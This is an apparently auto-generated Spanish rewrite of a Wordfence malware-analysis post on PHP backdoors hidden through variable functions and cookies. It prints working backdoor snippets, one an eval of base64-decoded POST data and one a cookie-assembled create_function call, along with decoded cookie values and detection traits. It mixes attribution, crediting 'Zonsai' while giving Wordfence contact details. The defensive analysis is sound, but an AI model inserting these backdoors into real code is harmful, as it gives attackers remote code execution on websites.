Malware que Utiliza Funciones Variables y Cookies para Ocultar su Verdadera Naturaleza

“`html

Desentrañando el Malware: Uso de Funciones Variables y Cookies para la Ofuscación

En Zonsai, hemos observado como uno de los temas recurrentes en el análisis de malware es la ofuscación. Muchos atacantes optan por ocultar sus scripts mediante técnicas sofisticadas, tratando de evadir la detección de las herramientas de seguridad. Una de las estrategias más utilizadas es el uso de funciones variables y cookies, un método tan astuto como efectivo que merece ser examinado con mayor profundidad.

¿Qué Son las Funciones Variables?

Para quienes no estén familiarizados, las funciones variables en PHP permiten que un nombre de variable se evalúe como el nombre de una función. Aunque su uso puede ser legítimo, los actores maliciosos lo aprovechan con intenciones oscuras. Vamos a ilustrarlo con un ejemplo básico de un backdoor:

<?php $hello = 'eval';
$world = 'base64_decode';
$hello($world($_POST['payload']));

Este fragmento de código es un claro ejemplo de cómo las funciones se pueden invocar de forma no convencional para ejecutar código malicioso. Reconocer este patrón es esencial, pero la dificultad radica en que la detección se complica si el orden de asignación de las variables cambia.

El Poder de las Cookies

Todos hemos visto esos molestos avisos sobre cookies en la web. Son esencialmente pequeños archivos de texto que almacenan información sobre nuestras interacciones en un sitio. Los atacantes utilizan estas cookies para su beneficio, manipulando la información que se envía entre el navegador y el servidor para disfrazar sus actividades maliciosas.

Análisis de Muestras de Malware

Hoy, vamos a examinar algunas muestras de malware que han incorporado estas técnicas de ofuscación. La primera muestra no intenta pasar desapercibida, sino que usa una combinación de métodos para confundir a los escáneres de seguridad.

<?php $args = 22; $locale = $_COOKIE; $image_url = sizeof($locale); if($image_url == 11) { if (in_array(gettype($locale).count($locale),$locale)) { $locale[79] = $locale[79].$locale[94]; $locale[23] = $locale[79]($locale[23]); $locale = $locale[23]($locale[64],$locale[79]($locale[18])); $type = 78; $locale($args,$image_url,$type); } }

La pieza de código anterior implementa una lógica compleja que se apoya en la manipulación de cookies. Requiere que un número específico de cookies sean enviadas para proceder, lo que lo convierte en un objetivo difícil de detectar a simple vista.

Desglose del Malware

Un análisis de los valores de cookies revelaría lo siguiente:

$_COOKIE[79] = "base64_"
$_COOKIE[94] = "decode"
$_COOKIE[23] = "Y3JlYXRlX2Z1bmN0aW9u" // base64 para “create_function”
$_COOKIE[18] = "ZWNobyAiUHduZWQiOw==" // base64 para echo “Pwned”;
$_COOKIE[64] = '$a,$b,$c' // lista de argumentos para la función creada

Este script demuestra cómo la combinación de cookies y funciones variables puede facilitar la ejecución de código malicioso, creando un backdoor que permite el control remoto incluso en entornos más estables.

Estrategias de Detección de Malware

Las firmas utilizadas para detectar los ejemplos de malware presentados han tenido más de 30,000 detecciones en un solo mes. Las características típicas incluyen:

• Códigos cortos y densamente ofuscados que no siguen las convenciones estándares de programación.
• Un uso excesivo de manipulaciones de arrays y cookies.
• Comprobaciones de cookies que evitan su uso por actores no autorizados.
• Implementación de funciones variables.

Si bien estos patrones pueden ser difíciles de detectar, son nuestra mejor herramienta para identificar posibles amenazas. En nuestra misión de mantener el ciberespacio seguro, estamos continuamente en busca de nuevas variantes de malware. Si te encuentras con algún código malicioso que nuestros sistemas no detectan, por favor envíanoslo a samples@wordfence.com para enriquecer nuestra base de datos y mejorar nuestras capacidades de detección.

Conclusión

En resumen, los métodos de ofuscación que utilizan funciones variables y cookies son una técnica antigua pero muy efectiva que sigue siendo relevante. En Zonsai, seguimos comprometidos con tu seguridad y con la detección eficaz de amenazas en el vasto mundo digital. Estar al tanto de estas técnicas es fundamental para cualquier profesional de la ciberseguridad que busque proteger sus activos digitales de manera eficaz.

“`

Puedes consultar el artículo original aquí: https://www.wordfence.com/blog/2025/10/malware-using-variable-functions-and-cookies-for-obfuscation/

Este contenido ha sido generado automáticamente con el plugin Autoblog AI. Desarrollado por Zonsai.